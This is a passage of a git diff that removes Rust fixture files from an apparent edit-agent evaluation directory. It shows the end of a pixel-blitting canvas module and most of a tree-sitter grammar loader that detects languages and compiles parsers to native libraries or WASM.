size.x() as usize * dest_bytes_per_pixel; - let src_row_stride = utils::div_round_up(size.x() as usize, 8); - - for y in 0..size.y() { - let (dest_row_start, src_row_start) = ( - (y + dst_rect.origin_y()) as usize * self.stride - + dst_rect.origin_x() as usize * dest_bytes_per_pixel, - y as usize * src_stride, - ); - let dest_row_end = dest_row_start + dest_row_stride; - let src_row_end = src_row_start + src_row_stride; - let dest_row_pixels = &mut self.pixels[dest_row_start..dest_row_end]; - let src_row_pixels = &src_bytes[src_row_start..src_row_end]; - for x in 0..src_row_stride { - let pattern = &BITMAP_1BPP_TO_8BPP_LUT[src_row_pixels[x] as usize]; - let dest_start = x * 8; - let dest_end = cmp::min(dest_start + 8, dest_row_stride); - let src = &pattern[0..(dest_end - dest_start)]; - dest_row_pixels[dest_start..dest_end].clone_from_slice(src); - } - } - } - - /// Blits to area `rect` using the data given in the buffer `src_bytes`. - /// `src_stride` must be specified in bytes. - /// The dimensions of `rect` must be in pixels. 
- fn blit_from_with( - &mut self, - rect: RectI, - src_bytes: &[u8], - src_stride: usize, - src_format: Format, - ) { - let src_bytes_per_pixel = src_format.bytes_per_pixel() as usize; - let dest_bytes_per_pixel = self.format.bytes_per_pixel() as usize; - - for y in 0..rect.height() { - let (dest_row_start, src_row_start) = ( - (y + rect.origin_y()) as usize * self.stride - + rect.origin_x() as usize * dest_bytes_per_pixel, - y as usize * src_stride, - ); - let dest_row_end = dest_row_start + rect.width() as usize * dest_bytes_per_pixel; - let src_row_end = src_row_start + rect.width() as usize * src_bytes_per_pixel; - let dest_row_pixels = &mut self.pixels[dest_row_start..dest_row_end]; - let src_row_pixels = &src_bytes[src_row_start..src_row_end]; - B::blit(dest_row_pixels, src_row_pixels) - } - } -} - -impl fmt::Debug for Canvas { - fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { - f.debug_struct("Canvas") - .field("pixels", &self.pixels.len()) // Do not dump a vector content. - .field("size", &self.size) - .field("stride", &self.stride) - .field("format", &self.format) - .finish() - } -} - -/// The image format for the canvas. -#[derive(Clone, Copy, Debug, PartialEq)] -pub enum Format { - /// Premultiplied R8G8B8A8, little-endian. - Rgba32, - /// R8G8B8, little-endian. - Rgb24, - /// A8. - A8, -} - -impl Format { - /// Returns the number of bits per pixel that this image format corresponds to. - #[inline] - pub fn bits_per_pixel(self) -> u8 { - match self { - Format::Rgba32 => 32, - Format::Rgb24 => 24, - Format::A8 => 8, - } - } - - /// Returns the number of color channels per pixel that this image format corresponds to. - #[inline] - pub fn components_per_pixel(self) -> u8 { - match self { - Format::Rgba32 => 4, - Format::Rgb24 => 3, - Format::A8 => 1, - } - } - - /// Returns the number of bits per color channel that this image format contains. 
- #[inline] - pub fn bits_per_component(self) -> u8 { - self.bits_per_pixel() / self.components_per_pixel() - } - - /// Returns the number of bytes per pixel that this image format corresponds to. - #[inline] - pub fn bytes_per_pixel(self) -> u8 { - self.bits_per_pixel() / 8 - } -} - -/// The antialiasing strategy that should be used when rasterizing glyphs. -#[derive(Clone, Copy, Debug, PartialEq)] -pub enum RasterizationOptions { - /// "Black-and-white" rendering. Each pixel is either entirely on or off. - Bilevel, - /// Grayscale antialiasing. Only one channel is used. - GrayscaleAa, - /// Subpixel RGB antialiasing, for LCD screens. - SubpixelAa, -} - -trait Blit { - fn blit(dest: &mut [u8], src: &[u8]); -} - -struct BlitMemcpy; - -impl Blit for BlitMemcpy { - #[inline] - fn blit(dest: &mut [u8], src: &[u8]) { - dest.clone_from_slice(src) - } -} - -struct BlitRgb24ToA8; - -impl Blit for BlitRgb24ToA8 { - #[inline] - fn blit(dest: &mut [u8], src: &[u8]) { - // TODO(pcwalton): SIMD. - for (dest, src) in dest.iter_mut().zip(src.chunks(3)) { - *dest = src[1] - } - } -} - -struct BlitA8ToRgb24; - -impl Blit for BlitA8ToRgb24 { - #[inline] - fn blit(dest: &mut [u8], src: &[u8]) { - for (dest, src) in dest.chunks_mut(3).zip(src.iter()) { - dest[0] = *src; - dest[1] = *src; - dest[2] = *src; - } - } -} - -struct BlitRgba32ToRgb24; - -impl Blit for BlitRgba32ToRgb24 { - #[inline] - fn blit(dest: &mut [u8], src: &[u8]) { - // TODO(pcwalton): SIMD. 
- for (dest, src) in dest.chunks_mut(3).zip(src.chunks(4)) { - dest.copy_from_slice(&src[0..3]) - } - } -} - -struct BlitRgb24ToRgba32; - -impl Blit for BlitRgb24ToRgba32 { - fn blit(dest: &mut [u8], src: &[u8]) { - for (dest, src) in dest.chunks_mut(4).zip(src.chunks(3)) { - dest[0] = src[0]; - dest[1] = src[1]; - dest[2] = src[2]; - dest[3] = 255; - } - } -} diff --git a/crates/agent/src/edit_agent/evals/fixtures/use_wasi_sdk_in_compile_parser_to_wasm/before.rs b/crates/agent/src/edit_agent/evals/fixtures/use_wasi_sdk_in_compile_parser_to_wasm/before.rs deleted file mode 100644 index cfa28fe1ad6091..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/use_wasi_sdk_in_compile_parser_to_wasm/before.rs +++ /dev/null @@ -1,1629 +0,0 @@ -#![doc = include_str!("../README.md")] -#![cfg_attr(docsrs, feature(doc_cfg))] - -#[cfg(any(feature = "tree-sitter-highlight", feature = "tree-sitter-tags"))] -use std::ops::Range; -#[cfg(feature = "tree-sitter-highlight")] -use std::sync::Mutex; -use std::{ - collections::HashMap, - env, - ffi::{OsStr, OsString}, - fs, - io::{BufRead, BufReader}, - mem, - path::{Path, PathBuf}, - process::Command, - sync::LazyLock, - time::SystemTime, -}; - -#[cfg(any(feature = "tree-sitter-highlight", feature = "tree-sitter-tags"))] -use anyhow::Error; -use anyhow::{Context as _, Result, anyhow}; -use etcetera::BaseStrategy as _; -use fs4::fs_std::FileExt; -use indoc::indoc; -use libloading::{Library, Symbol}; -use once_cell::unsync::OnceCell; -use path_slash::PathBufExt as _; -use regex::{Regex, RegexBuilder}; -use semver::Version; -use serde::{Deserialize, Deserializer, Serialize}; -use tree_sitter::Language; -#[cfg(any(feature = "tree-sitter-highlight", feature = "tree-sitter-tags"))] -use tree_sitter::QueryError; -#[cfg(feature = "tree-sitter-highlight")] -use tree_sitter::QueryErrorKind; -#[cfg(feature = "tree-sitter-highlight")] -use tree_sitter_highlight::HighlightConfiguration; -#[cfg(feature = "tree-sitter-tags")] -use 
tree_sitter_tags::{Error as TagsError, TagsConfiguration}; -use url::Url; - -static GRAMMAR_NAME_REGEX: LazyLock = - LazyLock::new(|| Regex::new(r#""name":\s*"(.*?)""#).unwrap()); - -pub const EMSCRIPTEN_TAG: &str = concat!("docker.io/emscripten/emsdk:", env!("EMSCRIPTEN_VERSION")); - -#[derive(Default, Deserialize, Serialize)] -pub struct Config { - #[serde(default)] - #[serde( - rename = "parser-directories", - deserialize_with = "deserialize_parser_directories" - )] - pub parser_directories: Vec, -} - -#[derive(Serialize, Deserialize, Clone, Default)] -#[serde(untagged)] -pub enum PathsJSON { - #[default] - Empty, - Single(PathBuf), - Multiple(Vec), -} - -impl PathsJSON { - fn into_vec(self) -> Option> { - match self { - Self::Empty => None, - Self::Single(s) => Some(vec![s]), - Self::Multiple(s) => Some(s), - } - } - - const fn is_empty(&self) -> bool { - matches!(self, Self::Empty) - } -} - -#[derive(Serialize, Deserialize, Clone)] -#[serde(untagged)] -pub enum PackageJSONAuthor { - String(String), - Object { - name: String, - email: Option, - url: Option, - }, -} - -#[derive(Serialize, Deserialize, Clone)] -#[serde(untagged)] -pub enum PackageJSONRepository { - String(String), - Object { url: String }, -} - -#[derive(Serialize, Deserialize)] -pub struct PackageJSON { - pub name: String, - pub version: Version, - pub description: Option, - pub author: Option, - pub maintainers: Option>, - pub license: Option, - pub repository: Option, - #[serde(default)] - #[serde(rename = "tree-sitter", skip_serializing_if = "Option::is_none")] - pub tree_sitter: Option>, -} - -fn default_path() -> PathBuf { - PathBuf::from(".") -} - -#[derive(Serialize, Deserialize, Clone)] -#[serde(rename_all = "kebab-case")] -pub struct LanguageConfigurationJSON { - #[serde(default = "default_path")] - pub path: PathBuf, - pub scope: Option, - pub file_types: Option>, - pub content_regex: Option, - pub first_line_regex: Option, - pub injection_regex: Option, - #[serde(default, 
skip_serializing_if = "PathsJSON::is_empty")] - pub highlights: PathsJSON, - #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] - pub injections: PathsJSON, - #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] - pub locals: PathsJSON, - #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] - pub tags: PathsJSON, - #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] - pub external_files: PathsJSON, -} - -#[derive(Serialize, Deserialize)] -#[serde(rename_all = "kebab-case")] -pub struct TreeSitterJSON { - #[serde(rename = "$schema")] - pub schema: Option, - pub grammars: Vec, - pub metadata: Metadata, - #[serde(default)] - pub bindings: Bindings, -} - -impl TreeSitterJSON { - pub fn from_file(path: &Path) -> Result { - Ok(serde_json::from_str(&fs::read_to_string( - path.join("tree-sitter.json"), - )?)?) - } - - #[must_use] - pub fn has_multiple_language_configs(&self) -> bool { - self.grammars.len() > 1 - } -} - -#[derive(Serialize, Deserialize)] -#[serde(rename_all = "kebab-case")] -pub struct Grammar { - pub name: String, - #[serde(skip_serializing_if = "Option::is_none")] - pub camelcase: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub title: Option, - pub scope: String, - #[serde(skip_serializing_if = "Option::is_none")] - pub path: Option, - #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] - pub external_files: PathsJSON, - pub file_types: Option>, - #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] - pub highlights: PathsJSON, - #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] - pub injections: PathsJSON, - #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] - pub locals: PathsJSON, - #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] - pub tags: PathsJSON, - #[serde(skip_serializing_if = "Option::is_none")] - pub injection_regex: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub first_line_regex: Option, - 
#[serde(skip_serializing_if = "Option::is_none")] - pub content_regex: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub class_name: Option, -} - -#[derive(Serialize, Deserialize)] -pub struct Metadata { - pub version: Version, - #[serde(skip_serializing_if = "Option::is_none")] - pub license: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub description: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub authors: Option>, - #[serde(skip_serializing_if = "Option::is_none")] - pub links: Option, - #[serde(skip)] - pub namespace: Option, -} - -#[derive(Serialize, Deserialize)] -pub struct Author { - pub name: String, - #[serde(skip_serializing_if = "Option::is_none")] - pub email: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub url: Option, -} - -#[derive(Serialize, Deserialize)] -pub struct Links { - pub repository: Url, - #[serde(skip_serializing_if = "Option::is_none")] - pub funding: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub homepage: Option, -} - -#[derive(Serialize, Deserialize)] -#[serde(default)] -pub struct Bindings { - pub c: bool, - pub go: bool, - #[serde(skip)] - pub java: bool, - #[serde(skip)] - pub kotlin: bool, - pub node: bool, - pub python: bool, - pub rust: bool, - pub swift: bool, - pub zig: bool, -} - -impl Default for Bindings { - fn default() -> Self { - Self { - c: true, - go: true, - java: false, - kotlin: false, - node: true, - python: true, - rust: true, - swift: true, - zig: false, - } - } -} - -// Replace `~` or `$HOME` with home path string. -// (While paths like "~/.tree-sitter/config.json" can be deserialized, -// they're not valid path for I/O modules.) 
-fn deserialize_parser_directories<'de, D>(deserializer: D) -> Result, D::Error> -where - D: Deserializer<'de>, -{ - let paths = Vec::::deserialize(deserializer)?; - let Ok(home) = etcetera::home_dir() else { - return Ok(paths); - }; - let standardized = paths - .into_iter() - .map(|path| standardize_path(path, &home)) - .collect(); - Ok(standardized) -} - -fn standardize_path(path: PathBuf, home: &Path) -> PathBuf { - if let Ok(p) = path.strip_prefix("~") { - return home.join(p); - } - if let Ok(p) = path.strip_prefix("$HOME") { - return home.join(p); - } - path -} - -impl Config { - #[must_use] - pub fn initial() -> Self { - let home_dir = etcetera::home_dir().expect("Cannot determine home directory"); - Self { - parser_directories: vec![ - home_dir.join("github"), - home_dir.join("src"), - home_dir.join("source"), - home_dir.join("projects"), - home_dir.join("dev"), - home_dir.join("git"), - ], - } - } -} - -const BUILD_TARGET: &str = env!("BUILD_TARGET"); -const BUILD_HOST: &str = env!("BUILD_HOST"); - -pub struct LanguageConfiguration<'a> { - pub scope: Option, - pub content_regex: Option, - pub first_line_regex: Option, - pub injection_regex: Option, - pub file_types: Vec, - pub root_path: PathBuf, - pub highlights_filenames: Option>, - pub injections_filenames: Option>, - pub locals_filenames: Option>, - pub tags_filenames: Option>, - pub language_name: String, - language_id: usize, - #[cfg(feature = "tree-sitter-highlight")] - highlight_config: OnceCell>, - #[cfg(feature = "tree-sitter-tags")] - tags_config: OnceCell>, - #[cfg(feature = "tree-sitter-highlight")] - highlight_names: &'a Mutex>, - #[cfg(feature = "tree-sitter-highlight")] - use_all_highlight_names: bool, -} - -pub struct Loader { - pub parser_lib_path: PathBuf, - languages_by_id: Vec<(PathBuf, OnceCell, Option>)>, - language_configurations: Vec>, - language_configuration_ids_by_file_type: HashMap>, - language_configuration_in_current_path: Option, - 
language_configuration_ids_by_first_line_regex: HashMap>, - #[cfg(feature = "tree-sitter-highlight")] - highlight_names: Box>>, - #[cfg(feature = "tree-sitter-highlight")] - use_all_highlight_names: bool, - debug_build: bool, - sanitize_build: bool, - force_rebuild: bool, - - #[cfg(feature = "wasm")] - wasm_store: Mutex>, -} - -pub struct CompileConfig<'a> { - pub src_path: &'a Path, - pub header_paths: Vec<&'a Path>, - pub parser_path: PathBuf, - pub scanner_path: Option, - pub external_files: Option<&'a [PathBuf]>, - pub output_path: Option, - pub flags: &'a [&'a str], - pub sanitize: bool, - pub name: String, -} - -impl<'a> CompileConfig<'a> { - #[must_use] - pub fn new( - src_path: &'a Path, - externals: Option<&'a [PathBuf]>, - output_path: Option, - ) -> Self { - Self { - src_path, - header_paths: vec![src_path], - parser_path: src_path.join("parser.c"), - scanner_path: None, - external_files: externals, - output_path, - flags: &[], - sanitize: false, - name: String::new(), - } - } -} - -unsafe impl Sync for Loader {} - -impl Loader { - pub fn new() -> Result { - let parser_lib_path = if let Ok(path) = env::var("TREE_SITTER_LIBDIR") { - PathBuf::from(path) - } else { - if cfg!(target_os = "macos") { - let legacy_apple_path = etcetera::base_strategy::Apple::new()? - .cache_dir() // `$HOME/Library/Caches/` - .join("tree-sitter"); - if legacy_apple_path.exists() && legacy_apple_path.is_dir() { - std::fs::remove_dir_all(legacy_apple_path)?; - } - } - - etcetera::choose_base_strategy()? 
- .cache_dir() - .join("tree-sitter") - .join("lib") - }; - Ok(Self::with_parser_lib_path(parser_lib_path)) - } - - #[must_use] - pub fn with_parser_lib_path(parser_lib_path: PathBuf) -> Self { - Self { - parser_lib_path, - languages_by_id: Vec::new(), - language_configurations: Vec::new(), - language_configuration_ids_by_file_type: HashMap::new(), - language_configuration_in_current_path: None, - language_configuration_ids_by_first_line_regex: HashMap::new(), - #[cfg(feature = "tree-sitter-highlight")] - highlight_names: Box::new(Mutex::new(Vec::new())), - #[cfg(feature = "tree-sitter-highlight")] - use_all_highlight_names: true, - debug_build: false, - sanitize_build: false, - force_rebuild: false, - - #[cfg(feature = "wasm")] - wasm_store: Mutex::default(), - } - } - - #[cfg(feature = "tree-sitter-highlight")] - #[cfg_attr(docsrs, doc(cfg(feature = "tree-sitter-highlight")))] - pub fn configure_highlights(&mut self, names: &[String]) { - self.use_all_highlight_names = false; - let mut highlights = self.highlight_names.lock().unwrap(); - highlights.clear(); - highlights.extend(names.iter().cloned()); - } - - #[must_use] - #[cfg(feature = "tree-sitter-highlight")] - #[cfg_attr(docsrs, doc(cfg(feature = "tree-sitter-highlight")))] - pub fn highlight_names(&self) -> Vec { - self.highlight_names.lock().unwrap().clone() - } - - pub fn find_all_languages(&mut self, config: &Config) -> Result<()> { - if config.parser_directories.is_empty() { - eprintln!("Warning: You have not configured any parser directories!"); - eprintln!("Please run `tree-sitter init-config` and edit the resulting"); - eprintln!("configuration file to indicate where we should look for"); - eprintln!("language grammars.\n"); - } - for parser_container_dir in &config.parser_directories { - if let Ok(entries) = fs::read_dir(parser_container_dir) { - for entry in entries { - let entry = entry?; - if let Some(parser_dir_name) = entry.file_name().to_str() { - if parser_dir_name.starts_with("tree-sitter-") 
{ - self.find_language_configurations_at_path( - &parser_container_dir.join(parser_dir_name), - false, - ) - .ok(); - } - } - } - } - } - Ok(()) - } - - pub fn languages_at_path(&mut self, path: &Path) -> Result> { - if let Ok(configurations) = self.find_language_configurations_at_path(path, true) { - let mut language_ids = configurations - .iter() - .map(|c| (c.language_id, c.language_name.clone())) - .collect::>(); - language_ids.sort_unstable(); - language_ids.dedup(); - language_ids - .into_iter() - .map(|(id, name)| Ok((self.language_for_id(id)?, name))) - .collect::>>() - } else { - Ok(Vec::new()) - } - } - - #[must_use] - pub fn get_all_language_configurations(&self) -> Vec<(&LanguageConfiguration, &Path)> { - self.language_configurations - .iter() - .map(|c| (c, self.languages_by_id[c.language_id].0.as_ref())) - .collect() - } - - pub fn language_configuration_for_scope( - &self, - scope: &str, - ) -> Result> { - for configuration in &self.language_configurations { - if configuration.scope.as_ref().is_some_and(|s| s == scope) { - let language = self.language_for_id(configuration.language_id)?; - return Ok(Some((language, configuration))); - } - } - Ok(None) - } - - pub fn language_configuration_for_first_line_regex( - &self, - path: &Path, - ) -> Result> { - self.language_configuration_ids_by_first_line_regex - .iter() - .try_fold(None, |_, (regex, ids)| { - if let Some(regex) = Self::regex(Some(regex)) { - let file = fs::File::open(path)?; - let reader = BufReader::new(file); - let first_line = reader.lines().next().transpose()?; - if let Some(first_line) = first_line { - if regex.is_match(&first_line) && !ids.is_empty() { - let configuration = &self.language_configurations[ids[0]]; - let language = self.language_for_id(configuration.language_id)?; - return Ok(Some((language, configuration))); - } - } - } - - Ok(None) - }) - } - - pub fn language_configuration_for_file_name( - &self, - path: &Path, - ) -> Result> { - // Find all the language configurations 
that match this file name - // or a suffix of the file name. - let configuration_ids = path - .file_name() - .and_then(|n| n.to_str()) - .and_then(|file_name| self.language_configuration_ids_by_file_type.get(file_name)) - .or_else(|| { - let mut path = path.to_owned(); - let mut extensions = Vec::with_capacity(2); - while let Some(extension) = path.extension() { - extensions.push(extension.to_str()?.to_string()); - path = PathBuf::from(path.file_stem()?.to_os_string()); - } - extensions.reverse(); - self.language_configuration_ids_by_file_type - .get(&extensions.join(".")) - }); - - if let Some(configuration_ids) = configuration_ids { - if !configuration_ids.is_empty() { - let configuration = if configuration_ids.len() == 1 { - &self.language_configurations[configuration_ids[0]] - } - // If multiple language configurations match, then determine which - // one to use by applying the configurations' content regexes. - else { - let file_contents = fs::read(path) - .with_context(|| format!("Failed to read path {}", path.display()))?; - let file_contents = String::from_utf8_lossy(&file_contents); - let mut best_score = -2isize; - let mut best_configuration_id = None; - for configuration_id in configuration_ids { - let config = &self.language_configurations[*configuration_id]; - - // If the language configuration has a content regex, assign - // a score based on the length of the first match. - let score; - if let Some(content_regex) = &config.content_regex { - if let Some(mat) = content_regex.find(&file_contents) { - score = (mat.end() - mat.start()) as isize; - } - // If the content regex does not match, then *penalize* this - // language configuration, so that language configurations - // without content regexes are preferred over those with - // non-matching content regexes. 
- else { - score = -1; - } - } else { - score = 0; - } - if score > best_score { - best_configuration_id = Some(*configuration_id); - best_score = score; - } - } - - &self.language_configurations[best_configuration_id.unwrap()] - }; - - let language = self.language_for_id(configuration.language_id)?; - return Ok(Some((language, configuration))); - } - } - - Ok(None) - } - - pub fn language_configuration_for_injection_string( - &self, - string: &str, - ) -> Result> { - let mut best_match_length = 0; - let mut best_match_position = None; - for (i, configuration) in self.language_configurations.iter().enumerate() { - if let Some(injection_regex) = &configuration.injection_regex { - if let Some(mat) = injection_regex.find(string) { - let length = mat.end() - mat.start(); - if length > best_match_length { - best_match_position = Some(i); - best_match_length = length; - } - } - } - } - - if let Some(i) = best_match_position { - let configuration = &self.language_configurations[i]; - let language = self.language_for_id(configuration.language_id)?; - Ok(Some((language, configuration))) - } else { - Ok(None) - } - } - - pub fn language_for_configuration( - &self, - configuration: &LanguageConfiguration, - ) -> Result { - self.language_for_id(configuration.language_id) - } - - fn language_for_id(&self, id: usize) -> Result { - let (path, language, externals) = &self.languages_by_id[id]; - language - .get_or_try_init(|| { - let src_path = path.join("src"); - self.load_language_at_path(CompileConfig::new( - &src_path, - externals.as_deref(), - None, - )) - }) - .cloned() - } - - pub fn compile_parser_at_path( - &self, - grammar_path: &Path, - output_path: PathBuf, - flags: &[&str], - ) -> Result<()> { - let src_path = grammar_path.join("src"); - let mut config = CompileConfig::new(&src_path, None, Some(output_path)); - config.flags = flags; - self.load_language_at_path(config).map(|_| ()) - } - - pub fn load_language_at_path(&self, mut config: CompileConfig) -> Result { - let 
grammar_path = config.src_path.join("grammar.json"); - config.name = Self::grammar_json_name(&grammar_path)?; - self.load_language_at_path_with_name(config) - } - - pub fn load_language_at_path_with_name(&self, mut config: CompileConfig) -> Result { - let mut lib_name = config.name.to_string(); - let language_fn_name = format!( - "tree_sitter_{}", - replace_dashes_with_underscores(&config.name) - ); - if self.debug_build { - lib_name.push_str(".debug._"); - } - - if self.sanitize_build { - lib_name.push_str(".sanitize._"); - config.sanitize = true; - } - - if config.output_path.is_none() { - fs::create_dir_all(&self.parser_lib_path)?; - } - - let mut recompile = self.force_rebuild || config.output_path.is_some(); // if specified, always recompile - - let output_path = config.output_path.unwrap_or_else(|| { - let mut path = self.parser_lib_path.join(lib_name); - path.set_extension(env::consts::DLL_EXTENSION); - #[cfg(feature = "wasm")] - if self.wasm_store.lock().unwrap().is_some() { - path.set_extension("wasm"); - } - path - }); - config.output_path = Some(output_path.clone()); - - let parser_path = config.src_path.join("parser.c"); - config.scanner_path = self.get_scanner_path(config.src_path); - - let mut paths_to_check = vec![parser_path]; - - if let Some(scanner_path) = config.scanner_path.as_ref() { - paths_to_check.push(scanner_path.clone()); - } - - paths_to_check.extend( - config - .external_files - .unwrap_or_default() - .iter() - .map(|p| config.src_path.join(p)), - ); - - if !recompile { - recompile = needs_recompile(&output_path, &paths_to_check) - .with_context(|| "Failed to compare source and binary timestamps")?; - } - - #[cfg(feature = "wasm")] - if let Some(wasm_store) = self.wasm_store.lock().unwrap().as_mut() { - if recompile { - self.compile_parser_to_wasm( - &config.name, - None, - config.src_path, - config - .scanner_path - .as_ref() - .and_then(|p| p.strip_prefix(config.src_path).ok()), - &output_path, - false, - )?; - } - - let wasm_bytes = 
fs::read(&output_path)?; - return Ok(wasm_store.load_language(&config.name, &wasm_bytes)?); - } - - let lock_path = if env::var("CROSS_RUNNER").is_ok() { - tempfile::tempdir() - .unwrap() - .path() - .join("tree-sitter") - .join("lock") - .join(format!("{}.lock", config.name)) - } else { - etcetera::choose_base_strategy()? - .cache_dir() - .join("tree-sitter") - .join("lock") - .join(format!("{}.lock", config.name)) - }; - - if let Ok(lock_file) = fs::OpenOptions::new().write(true).open(&lock_path) { - recompile = false; - if lock_file.try_lock_exclusive().is_err() { - // if we can't acquire the lock, another process is compiling the parser, wait for - // it and don't recompile - lock_file.lock_exclusive()?; - recompile = false; - } else { - // if we can acquire the lock, check if the lock file is older than 30 seconds, a - // run that was interrupted and left the lock file behind should not block - // subsequent runs - let time = lock_file.metadata()?.modified()?.elapsed()?.as_secs(); - if time > 30 { - fs::remove_file(&lock_path)?; - recompile = true; - } - } - } - - if recompile { - fs::create_dir_all(lock_path.parent().unwrap()).with_context(|| { - format!( - "Failed to create directory {}", - lock_path.parent().unwrap().display() - ) - })?; - let lock_file = fs::OpenOptions::new() - .create(true) - .truncate(true) - .write(true) - .open(&lock_path)?; - lock_file.lock_exclusive()?; - - self.compile_parser_to_dylib(&config, &lock_file, &lock_path)?; - - if config.scanner_path.is_some() { - self.check_external_scanner(&config.name, &output_path)?; - } - } - - let library = unsafe { Library::new(&output_path) } - .with_context(|| format!("Error opening dynamic library {}", output_path.display()))?; - let language = unsafe { - let language_fn = library - .get:: Language>>(language_fn_name.as_bytes()) - .with_context(|| format!("Failed to load symbol {language_fn_name}"))?; - language_fn() - }; - mem::forget(library); - Ok(language) - } - - fn 
compile_parser_to_dylib( - &self, - config: &CompileConfig, - lock_file: &fs::File, - lock_path: &Path, - ) -> Result<(), Error> { - let mut cc_config = cc::Build::new(); - cc_config - .cargo_metadata(false) - .cargo_warnings(false) - .target(BUILD_TARGET) - .host(BUILD_HOST) - .debug(self.debug_build) - .file(&config.parser_path) - .includes(&config.header_paths) - .std("c11"); - - if let Some(scanner_path) = config.scanner_path.as_ref() { - cc_config.file(scanner_path); - } - - if self.debug_build { - cc_config.opt_level(0).extra_warnings(true); - } else { - cc_config.opt_level(2).extra_warnings(false); - } - - for flag in config.flags { - cc_config.define(flag, None); - } - - let compiler = cc_config.get_compiler(); - let mut command = Command::new(compiler.path()); - command.args(compiler.args()); - for (key, value) in compiler.env() { - command.env(key, value); - } - - let output_path = config.output_path.as_ref().unwrap(); - - if compiler.is_like_msvc() { - let out = format!("-out:{}", output_path.to_str().unwrap()); - command.arg(if self.debug_build { "-LDd" } else { "-LD" }); - command.arg("-utf-8"); - command.args(cc_config.get_files()); - command.arg("-link").arg(out); - } else { - command.arg("-Werror=implicit-function-declaration"); - if cfg!(any(target_os = "macos", target_os = "ios")) { - command.arg("-dynamiclib"); - // TODO: remove when supported - command.arg("-UTREE_SITTER_REUSE_ALLOCATOR"); - } else { - command.arg("-shared"); - } - command.args(cc_config.get_files()); - command.arg("-o").arg(output_path); - } - - let output = command.output().with_context(|| { - format!("Failed to execute the C compiler with the following command:\n{command:?}") - })?; - - FileExt::unlock(lock_file)?; - fs::remove_file(lock_path)?; - anyhow::ensure!( - output.status.success(), - "Parser compilation failed.\nStdout: {}\nStderr: {}", - String::from_utf8_lossy(&output.stdout), - String::from_utf8_lossy(&output.stderr) - ); - Ok(()) - } - - #[cfg(unix)] - fn 
check_external_scanner(&self, name: &str, library_path: &Path) -> Result<()> { - let prefix = if cfg!(any(target_os = "macos", target_os = "ios")) { - "_" - } else { - "" - }; - let mut must_have = vec![ - format!("{prefix}tree_sitter_{name}_external_scanner_create"), - format!("{prefix}tree_sitter_{name}_external_scanner_destroy"), - format!("{prefix}tree_sitter_{name}_external_scanner_serialize"), - format!("{prefix}tree_sitter_{name}_external_scanner_deserialize"), - format!("{prefix}tree_sitter_{name}_external_scanner_scan"), - ]; - - let command = Command::new("nm") - .arg("-W") - .arg("-U") - .arg(library_path) - .output(); - if let Ok(output) = command { - if output.status.success() { - let mut found_non_static = false; - for line in String::from_utf8_lossy(&output.stdout).lines() { - if line.contains(" T ") { - if let Some(function_name) = - line.split_whitespace().collect::>().get(2) - { - if !line.contains("tree_sitter_") { - if !found_non_static { - found_non_static = true; - eprintln!( - "Warning: Found non-static non-tree-sitter functions in the external scanner" - ); - } - eprintln!(" `{function_name}`"); - } else { - must_have.retain(|f| f != function_name); - } - } - } - } - if found_non_static { - eprintln!( - "Consider making these functions static, they can cause conflicts when another tree-sitter project uses the same function name" - ); - } - - if !must_have.is_empty() { - let missing = must_have - .iter() - .map(|f| format!(" `{f}`")) - .collect::>() - .join("\n"); - anyhow::bail!(format!(indoc! {" - Missing required functions in the external scanner, parsing won't work without these! 
- - {missing} - - You can read more about this at https://tree-sitter.github.io/tree-sitter/creating-parsers/4-external-scanners - "})); - } - } - } - - Ok(()) - } - - #[cfg(windows)] - fn check_external_scanner(&self, _name: &str, _library_path: &Path) -> Result<()> { - // TODO: there's no nm command on windows, whoever wants to implement this can and should :) - - // let mut must_have = vec![ - // format!("tree_sitter_{name}_external_scanner_create"), - // format!("tree_sitter_{name}_external_scanner_destroy"), - // format!("tree_sitter_{name}_external_scanner_serialize"), - // format!("tree_sitter_{name}_external_scanner_deserialize"), - // format!("tree_sitter_{name}_external_scanner_scan"), - // ]; - - Ok(()) - } - - pub fn compile_parser_to_wasm( - &self, - language_name: &str, - root_path: Option<&Path>, - src_path: &Path, - scanner_filename: Option<&Path>, - output_path: &Path, - force_docker: bool, - ) -> Result<(), Error> { - #[derive(PartialEq, Eq)] - enum EmccSource { - Native, - Docker, - Podman, - } - - let root_path = root_path.unwrap_or(src_path); - let emcc_name = if cfg!(windows) { "emcc.bat" } else { "emcc" }; - - // Order of preference: emscripten > docker > podman > error - let source = if !force_docker && Command::new(emcc_name).output().is_ok() { - EmccSource::Native - } else if Command::new("docker") - .output() - .is_ok_and(|out| out.status.success()) - { - EmccSource::Docker - } else if Command::new("podman") - .arg("--version") - .output() - .is_ok_and(|out| out.status.success()) - { - EmccSource::Podman - } else { - anyhow::bail!( - "You must have either emcc, docker, or podman on your PATH to run this command" - ); - }; - - let mut command = match source { - EmccSource::Native => { - let mut command = Command::new(emcc_name); - command.current_dir(src_path); - command - } - - EmccSource::Docker | EmccSource::Podman => { - let mut command = match source { - EmccSource::Docker => Command::new("docker"), - EmccSource::Podman => 
